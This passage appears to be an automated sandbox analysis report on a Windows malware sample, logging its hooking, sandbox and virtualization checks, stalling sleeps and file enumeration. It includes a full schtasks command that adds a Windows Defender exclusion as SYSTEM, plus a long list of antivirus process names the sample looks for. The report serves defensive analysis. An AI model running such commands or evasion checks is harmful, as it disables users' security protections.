                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeRegistry key created: HKEY_CURRENT_USER\System\CurrentControlSet\Services\SauronJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\W32Time\TimeProviders\NtpClientJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_0000000140001520 OpenSCManagerW,GetLastError,OpenServiceW,GetLastError,CloseServiceHandle,DeleteService,GetLastError,CloseServiceHandle,CloseServiceHandle,StartServiceCtrlDispatcherW,6_2_0000000140001520

                Hooking and other Techniques for Hiding and Protection

                barindex
                Overwrites code with unconditional jumps - possibly settings hooks in foreign process
                Source: C:\Users\user\Documents\l0tiFM.exeMemory written: PID: 6756 base: 7FFBCB910008 value: E9 EB D9 E9 FF Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeMemory written: PID: 6756 base: 7FFBCB7AD9F0 value: E9 20 26 16 00 Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeMemory written: PID: 4064 base: 7FFBCB910008 value: E9 EB D9 E9 FF Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeMemory written: PID: 4064 base: 7FFBCB7AD9F0 value: E9 20 26 16 00 Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 7124 base: 5F0005 value: E9 8B 2F E7 76 Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 7124 base: 77462F90 value: E9 7A D0 18 89 Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 7124 base: 9E0005 value: E9 8B 2F A8 76 Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 7124 base: 77462F90 value: E9 7A D0 57 89 Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 4472 base: 4E0005 value: E9 8B 2F F8 76
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 4472 base: 77462F90 value: E9 7A D0 07 89
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeMemory written: PID: 5420 base: 1100005 value: E9 8B 2F 36 76
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeMemory written: PID: 5420 base: 77462F90 value: E9 7A D0 C9 89
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 1308 base: 1800005 value: E9 8B 2F C6 75
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 1308 base: 77462F90 value: E9 7A D0 39 8A
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeMemory written: PID: 2388 base: FD0005 value: E9 8B 2F 49 76
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeMemory written: PID: 2388 base: 77462F90 value: E9 7A D0 B6 89
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 2076 base: BB0005 value: E9 8B 2F 8B 76
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeMemory written: PID: 2076 base: 77462F90 value: E9 7A D0 74 89
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004746A5 IsIconic,Sleep,49_2_004746A5
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D1946 IsWindowVisible,IsIconic,49_2_004D1946
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0046E9D4 __EH_prolog,IsWindow,IsWindow,IsWindowVisible,IsWindow,IsIconic,49_2_0046E9D4
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A6DC1 MonitorFromWindow,IsIconic,GetWindowPlacement,GetWindowRect,49_2_004A6DC1
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0045BE4B __EH_prolog,GetClientRect,GetWindowRect,IsIconic,IsWindowVisible,IsWindow,IsWindow,IsWindow,GetNextDlgTabItem,InvalidateRect,49_2_0045BE4B
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D4165 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,49_2_004D4165
                Source: C:\Users\user\Documents\l0tiFM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Found evasive API chain (may stop execution after checking mutex)
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_49-119721
                Found stalling execution ending in API Sleep call
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeStalling execution: Execution stalls by calling Sleepgraph_49-120210
                Switches to a custom stack to bypass stack traces
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CBA7C0E
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CB59F9E
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA55143
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA887AA
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA9080B
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CB97912
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CACF839
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 39CED6D
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 35B40CE
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 3591F74
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 3638F6F
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 35F336B
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 3960981
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 364A3BD
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA390FC
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6C9FBC04
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CBA8092
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C40CBDE
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C313E38
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C40B056
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C401EB4
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA5FFCB
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA38B19
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CB66E74
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C2F8B19
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C3487B1
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C3E5F8C
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CB4B056
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CB782C1
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CADC0AF
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CB86565
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA92089
                Source: C:\ProgramData\53jGFr5v.exeAPI/Special instruction interceptor: Address: 6515B1
                Source: C:\ProgramData\53jGFr5v.exeAPI/Special instruction interceptor: Address: 5C4DFD
                Source: C:\ProgramData\53jGFr5v.exeAPI/Special instruction interceptor: Address: 6615CC
                Source: C:\ProgramData\53jGFr5v.exeAPI/Special instruction interceptor: Address: 5A0CC6
                Source: C:\ProgramData\53jGFr5v.exeAPI/Special instruction interceptor: Address: 62AD53
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C1287AA
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C1E1EB4
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C248092
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C1287B1
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C16F839
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C0FFFCB
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeAPI/Special instruction interceptor: Address: 6C04DE34
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CAD183C
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA53E38
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CB4CBDE
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6CA887B1
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeAPI/Special instruction interceptor: Address: 6C9ADE34
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: {4E062DDA-444A-A2A8-84CE-E105F66A5AB3}SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEMCONSENTPROMPTBEHAVIORADMINSOFTWARE\PERFRPOOLSOFTWARE\PPFR49/56/235/24;9161POSTDATAC:\WINDOWS\SYSWOW64\DRIVERS\189ATOHCI.SYS360SAFE.EXE360SD.EXE360RP.EXE360RPS.EXESRAGENT.EXE360TRAY.EXEZHUDONGFANGYU.EXEKANKAN.EXESUPERKILLER.EXELIVEUPDATE360.EXEMODULEUPDATE.EXEFILESMASHER.EXEAGREEMENTVIEWER.EXESOFTMGRLITE.EXE360LEAKFIXER.EXE360SDRUN.EXE360SDUPD.EXE360FILEGUARD.EXEDEP360.EXEDUMPUPER.EXEDSMAIN.EXEDSMAIN64.EXEFIRSTAIDBOX.EXECHECKSM.EXEHIPSMAIN.EXEHIPSDAEMON.EXEHIPSTRAY.EXEHRUPDATE.EXEHIPSLOG.EXENETFLOW.EXEAUTORUNS.EXEUSYSDIAG.EXEWSCTRLSVC.EXEWSCTRL.EXEKXEMAIN.EXEKXESCORE.EXEKSCAN.EXEKXECENTER.EXEKXETRAY.EXEKDINFOMGR.EXEKISLIVE.EXEKNEWVIP.EXEKSOFTPURIFIER.EXEKTRASHAUTOCLEAN.EXEKAUTHORITYVIEW.EXETQCLIENT.EXETQEDRNAME.EXETQSAFEUI.EXETQTRAY.EXETRANTORAGENT.EXETQDEFENDER.EXETQUPDATEUI.EXETQWATERMARK.EXEDLPAPPDATA.EXENACLDIS.EXEMSMPENG.EXEMPCMDRUN.EXELDSHELPER.EXELDSSECURITY.EXELDSSECURITYAIDER.EXECOMPUTERZTRAY.EXECOMPUTERCENTER.EXEGUARDHP.EXECOMPUTERZ_CN.EXECOMPUTERZSERVICE.EXECOMPUTERZSERVICE_X64.EXEHDW_DISK_SCAN.EXECOMPUTERZMONHELPER.EXEDRVMGR.EXEWEB_HOST.EXE2345SAFECENTERSVC.EXE2345RTPROTECT.EXE2345SAFESVC.EXE2345MPCSAFE.EXE2345SAFETRAY.EXE2345SAFEUPDATE.EXE2345VIRUSSCAN.EXE2345MANUUPDATE.EXE2345ADRTPROTECT.EXE2345AUTHORITYPROTECT.EXE2345EXTSHELL.EXE2345EXTSHELL64.EXE2345FILESHRE.EXE2345LEAKFIXER.EXE2345LSPFIX.EXE2345PCSAFEBOOTASSISTANT.EXE2345RTPROTECTCENTER.EXE2345SHELLPRO.EXE2345SYSDOCTOR.EXELENOVOPCMANAGERSERVICE.EXELENOVOPCMANAGER.EXELAVSERVICE.EXELENOVOTRAY.EXELNVSVCFDN.EXEWSCTRL7.EXEWSCTRL10.EXEWSCTRL11.EXELENOVOAPPUPDATE.EXELENOVOAPPSTORE.EXEDESKTOPASSISTANTAPP.EXEDESKTOPASSISTANT.EXELENOVOMONITORMANAGER.EXELENOVOOKM.EXELEASHIVE.EXESTARTUPMANAGER.EXEWSPLUGINHOST.EXEWSPLUGINHOST64.EXECRASHPAD_HANDLER.EXESEARCHENGINE.EXELISFSERVICE.EXELSF.EXEAPPVANT.EXELENOVOINTERNETSOFTWAREFRAMEWORK.EXEEMDRIVERASSIST.EXELEAPPOM.EXEHOTFIXPLATFORM.EXEMSPCMANAGER.EXEMSPCMANAGERSERVICE.EXEAVP.EXEAVPUI.EXEAVASTSVC.EXEASWTOOLSSVC.EXEASWIDSAGENT.EXEWSC_PROXY.EXEAVASTUI.EXEAVIRA.SPOTLIGHT.SERVICE.EXEENDPOINTPROTECTION.EXESENTRYEYE.EXEAVIRA.SPOTLIGHT.COMMON.UPDATER.EXEAVIRA.SPOTLIGHT.FALLBACKUPDATER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.EXEAVIRA.SPOTLIGHT.SYSTRAY.APPLICATION.EXEAVIRA.OPTIMIZERHOST.EXEAVIRA.SPOTLIGHT.BOOTSTRAPPER.EXEAVIRA.SPOTLIGHT.SERVICE.WORKER.EXEAVIRA.SPOTLIGHT.COMMON.UPDATERTRACKER.EXEAVIRA.SPOTLIGHT.UI.APPLICATION.MESSAGING.EXEAVIRA.SPOTLIGHT.UI.ADMINISTRATIVERIGHTSPROVIDER.EXEMFEMMS.EXEMFEVTPS.EXEMCAPEXE.EXEMCSHIELD.EXEMCUICNT.EXEMFEAVSVC.EXENISSRV.EXESECURITYHEALTHSYSTRAY.EXEKWSPROTECT64.EXEQMDL.EXEQMPERSONALCENTER.EXEQQPCPATCH.EXEQQPCREALTIMESPEEDUP.EXEQQPCRTP.EXEQQPCTRAY.EXEQQREPAIR.EXEQQPCMGRUPDATE.EXEKSAFETRAY.EXEMPCOPYACCELERATOR.EXEUNTHREAT.EXEK7TSECURITY.EXEAD-WATCH.EXEPSAFESYSTRAY.EXEVSSERV.EXEREMUPD.EXERTVSCAN.EXEASHDISP.EXEAVCENTER.EXETMBMSRV.EXEKNSDTRAY.EXEV3SVC.EXEMSSECESS.EXEQUHLPSVC.EXERAVMOND.EXEKVMONXP.EXEBAIDUSAFETRAY.EXEBAIDUSD.EXEBKA.EXEBKA
                Source: DfP1K3.exe, 0000002A.00000002.3352086562.00000000032BD000.00000002.00001000.00020000.00000000.sdmpBinary or memory string: AUTORUNS.EXE
                Tries to detect virtualization through RDTSC time measurements
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeRDTSC instruction interceptor: First address: 1400010D3 second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a mov ecx, eax 0x0000000c nop 0x0000000d nop 0x0000000e dec eax 0x0000000f xor edx, edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 fldpi 0x00000015 frndint 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeRDTSC instruction interceptor: First address: 1400010EA second address: 1400010EA instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 xor ebx, ebx 0x00000009 dec eax 0x0000000a mov ebx, edx 0x0000000c dec eax 0x0000000d or eax, ebx 0x0000000f dec eax 0x00000010 sub eax, ecx 0x00000012 nop 0x00000013 dec ebp 0x00000014 xor edx, edx 0x00000016 dec esp 0x00000017 mov edx, eax 0x00000019 dec ebp 0x0000001a cmp edx, eax 0x0000001c jc 00007F69D0E6B510h 0x0000001e fldpi 0x00000020 frndint 0x00000022 rdtsc
                Source: C:\Users\user\Documents\l0tiFM.exeRDTSC instruction interceptor: First address: 5E1705 second address: 5E1713 instructions: 0x00000000 rdtsc 0x00000002 dec esp 0x00000003 mov ecx, edx 0x00000005 dec ecx 0x00000006 shl ecx, 20h 0x00000009 dec esp 0x0000000a or ecx, eax 0x0000000c frndint 0x0000000e rdtsc
                Source: C:\ProgramData\53jGFr5v.exeCode function: 48_2_004FD450 rdtsc 48_2_004FD450
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: EnumServicesStatusA,EnumServicesStatusA,GetLastError,EnumServicesStatusA,SetLastError,49_2_00401DAB
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 922337203685477
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 180000
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 6001668
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeDropped PE file which has not been started: C:\Windows\System32\drivers\189atohci.sysJump to dropped file
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_49-119831
                Source: C:\Program Files (x86)\3q7mMte5\Rpe5Ig0.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_44-3261
                Source: C:\Users\user\Documents\l0tiFM.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_6-14031
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_49-119716
                Source: C:\Users\user\Documents\l0tiFM.exeAPI coverage: 2.7 %
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeAPI coverage: 8.1 %
                Source: C:\Users\user\Documents\l0tiFM.exe TID: 2920Thread sleep time: -48000s >= -30000sJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exe TID: 6752Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exe TID: 6752Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 3528Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 3776Thread sleep time: -40000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 1452Thread sleep time: -60000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 3908Thread sleep count: 38 > 30Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 5996Thread sleep count: 69 > 30Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 5996Thread sleep time: -34500s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 3908Thread sleep count: 42 > 30Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 908Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 7108Thread sleep count: 61 > 30Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exe TID: 7108Thread sleep time: -30500s >= -30000sJump to behavior
                Source: C:\ProgramData\53jGFr5v.exe TID: 1980Thread sleep time: -39000s >= -30000s
                Source: C:\ProgramData\53jGFr5v.exe TID: 6728Thread sleep time: -45000s >= -30000s
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe TID: 5080Thread sleep time: -922337203685477s >= -30000s
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe TID: 1264Thread sleep time: -180000s >= -30000s
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exe TID: 3788Thread sleep time: -6001668s >= -30000s
                Source: C:\Users\user\Documents\l0tiFM.exeLast function: Thread delayed
                Source: C:\Users\user\Documents\l0tiFM.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\ProgramData\53jGFr5v.exeLast function: Thread delayed
                Source: C:\ProgramData\atBs3ba9\d0oKoK2T.exeLast function: Thread delayed
                Source: C:\Users\user\Documents\l0tiFM.exeCode function: 6_2_00007FFBC320A1B8 FindFirstFileExW,6_2_00007FFBC320A1B8
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004C5A33 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,49_2_004C5A33
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A1C80 FindFirstFileA,FindFirstFileA,FindFirstFileA,FindClose,49_2_004A1C80
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A04A0 FindFirstFileA,FileTimeToLocalFileTime,FileTimeToDosDateTime,FindClose,49_2_004A04A0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00408EFE __EH_prolog,GetFileAttributesA,lstrcpy,FindFirstFileA,FindClose,49_2_00408EFE
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00408E80 __EH_prolog,FindFirstFileA,FindClose,49_2_00408E80
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00409040 __EH_prolog,GetFullPathNameA,lstrcpyn,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpy,49_2_00409040
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040935F __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,49_2_0040935F
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040E79C __EH_prolog,FindFirstFileA,FindClose,49_2_0040E79C
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004CA859 FindFirstFileA,FindClose,49_2_004CA859
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_0040E965 __EH_prolog,FindFirstFileA,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,49_2_0040E965
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004469AF __EH_prolog,FindFirstFileA,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,FindFirstFileA,InterlockedIncrement,FindNextFileA,FindClose,49_2_004469AF
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004D2C75 __EH_prolog,lstrcpy,FtpFindFirstFileA,49_2_004D2C75
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004472CA __EH_prolog,FindFirstFileA,IsWindow,InterlockedIncrement,FindNextFileA,FindClose,49_2_004472CA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_004A73D0 lstrcpy,FindFirstFileA,GetLastError,SetLastError,49_2_004A73D0
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00427512 __EH_prolog,FindFirstFileA,FindClose,49_2_00427512
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_100126FA FindFirstFileExW,49_2_100126FA
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeCode function: 49_2_00425624 __EH_prolog,GetLogicalDriveStringsA,49_2_00425624
                Source: C:\Users\user\Documents\l0tiFM.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeThread delayed: delay time: 60000Jump to behavior
                Source: C:\Program Files (x86)\DfP1K3\DfP1K3.exeThread delayed: delay time: 30000Jump to behavior
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 922337203685477
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 180000
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeThread delayed: delay time: 6001668
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                Source: C:\Users\user\Documents\l0tiFM.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                Source: d0oKoK2T.exe, 00000034.00000002.3350448703.000001E8AC620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                Source: lBoqoqIC.exe, 00000031.00000002.3351643795.0000000003174000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW1
                Source: 2976587-987347589.07.exe, 00000000.00000003.1936053133.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, 2976587-987347589.07.exe, 00000000.00000003.1954802262.0000000000D30000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3348166976.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, DfP1K3.exe, 0000002A.00000002.3352818905.0000000003AC5000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe, 00000031.00000002.3351643795.0000000003174000.00000004.00000020.00020000.00000000.sdmp, lBoqoqIC.exe, 00000031.00000002.3351191479.0000000002BAA000.00000004.00000020.00020000.00000000.sdmp, d0oKoK2T.exe, 00000034.00000002.3350448703.000001E8AC620000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: C:\Users\user\Documents\l0tiFM.exeAPI call chain: ExitProcess graph end nodegraph_6-14032
                Source: C:\Users\user\Documents\l0tiFM.exeAPI call chain: ExitProcess graph end nodegraph_6-14374
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeAPI call chain: ExitProcess graph end nodegraph_49-119727
                Source: C:\ProgramData\efk2JUeS\lBoqoqIC.exeAPI call chain: ExitProcess graph end nodegraph_49-119722
                Source: C:\Users\user\Desktop\2976587-987347589.07.exeProcess information queried: ProcessInformationJump to behavior
